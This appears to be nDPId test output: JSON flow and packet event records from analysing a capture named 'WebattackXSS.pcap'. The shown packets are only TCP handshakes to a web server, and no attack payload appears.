-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":3,"flow_last_seen":1499347908254,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347908254,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XLhAAD4GaSCsEAABwKgKMoSkAFDBACLEb\/fpE4AQAOVpqQAAAQEICgE8fnQD5k\/o"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347909575,"flow_last_seen":1499347909575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347909575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1499347909575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/H5AAD4GyVGsEAABwKgKMoSyAFC+M4PAAAAAAKACchAXEwAAAgQFtAQCCAoBPH++AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":2,"flow_last_seen":1499347909575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347909575,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhLJ\/QSQIvjODwaAScSAfjwAAAgQFtAQCCAoD5lEzATx\/vgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":3,"flow_last_seen":1499347909576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347909576,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/H9AAD4GyVisEAABwKgKMoSyAFC+M4PBf0EkCYAQAOW+lQAAAQEICgE8f78D5lEz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347912141,"flow_last_seen":1499347912141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347912141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1499347912141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AShAAD4GxKisEAABwKgKMoTMAFAccoNoAAAAAKACchC2kAAAAgQFtAQCCAoBPIJAAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7846,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":2,"flow_last_seen":1499347912141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347912141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhMwGDz+bHHKDaaAScSAaKwAAAgQFtAQCCAoD5lO0ATyCQAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7847,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":3,"flow_last_seen":1499347912142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347912142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ASlAAD4GxK+sEAABwKgKMoTMAFAccoNpBg8\/nIAQAOW5MgAAAQEICgE8gkAD5lO0"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347913416,"flow_last_seen":1499347913416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347913416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1499347913416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80\/hAAD4G8desEAABwKgKMoTaAFDALVCHAAAAAKACchBEaQAAAgQFtAQCCAoBPIN\/AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":2,"flow_last_seen":1499347913416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347913416,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhNreW6gWwC1QiKAScSBl\/AAAAgQFtAQCCAoD5lTzATyDfwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":3,"flow_last_seen":1499347913417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347913417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00\/lAAD4G8d6sEAABwKgKMoTaAFDALVCI3luoF4AQAOUFBAAAAQEICgE8g38D5lTz"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347914710,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347914710,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7868,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oQ5AAD4GJMKsEAABwKgKMoToAFDafCXMAAAAAKACchBThAAAAgQFtAQCCAoBPITCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7869,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":2,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhOgBH2BK2nwlzaAScSCY3AAAAgQFtAQCCAoD5lY3ATyEwgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":3,"flow_last_seen":1499347914711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347914711,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oQ9AAD4GJMmsEAABwKgKMoToAFDafCXNAR9gS4AQAOU34wAAAQEICgE8hMMD5lY3"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347917322,"flow_last_seen":1499347917322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347917322,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1499347917322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917322,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CqdAAD4GuymsEAABwKgKMoUCAFC+4o3oAAAAAKACchAEWwAAAgQFtAQCCAoBPIdPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":2,"flow_last_seen":1499347917323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhQJ4jpXCvuKN6aAScSCaPgAAAgQFtAQCCAoD5ljEATyHTwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":3,"flow_last_seen":1499347917323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347917323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CqhAAD4GuzCsEAABwKgKMoUCAFC+4o3peI6Vw4AQAOU5RQAAAQEICgE8h1AD5ljE"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347918608,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347918608,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vWVAAD4GCGusEAABwKgKMoUQAFB11zX0AAAAAKACchCkCgAAAgQFtAQCCAoBPIiRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":2,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhRAjuy7Uddc19aAScSD0bgAAAgQFtAQCCAoD5loFATyIkQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":3,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vWZAAD4GCHKsEAABwKgKMoUQAFB11zX1I7su1YAQAOWTdgAAAQEICgE8iJED5loF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347921170,"flow_last_seen":1499347921170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347921170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1499347921170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rYJAAD4GGE6sEAABwKgKMoUqAFCWpCaTAAAAAKACchCQBAAAAgQFtAQCCAoBPIsRAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":2,"flow_last_seen":1499347921170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhSrhgaXUlqQmlKAScSCpIAAAAgQFtAQCCAoD5lyGATyLEQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":3,"flow_last_seen":1499347921171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347921171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rYNAAD4GGFWsEAABwKgKMoUqAFCWpCaU4YGl1YAQAOVIJwAAAQEICgE8ixID5lyG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347922471,"flow_last_seen":1499347922471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347922471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1499347922471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+oRAAD4Gy0usEAABwKgKMoU4AFCzyHbTAAAAAKACchAhTAAAAgQFtAQCCAoBPIxXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7931,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":2,"flow_last_seen":1499347922471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhTjpB7A2s8h21KAScSAnOwAAAgQFtAQCCAoD5l3LATyMVwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7932,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":3,"flow_last_seen":1499347922472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347922472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+oVAAD4Gy1KsEAABwKgKMoU4AFCzyHbU6QewN4AQAOXGQgAAAQEICgE8jFcD5l3L"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347923737,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347923737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ldBAAD4GMACsEAABwKgKMoVGAFBUeRhDAAAAAKACchDd4QAAAgQFtAQCCAoBPI2TAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":2,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhUa68naDVHkYRKAScSBKXQAAAgQFtAQCCAoD5l8HATyNkwEDAwc="} 
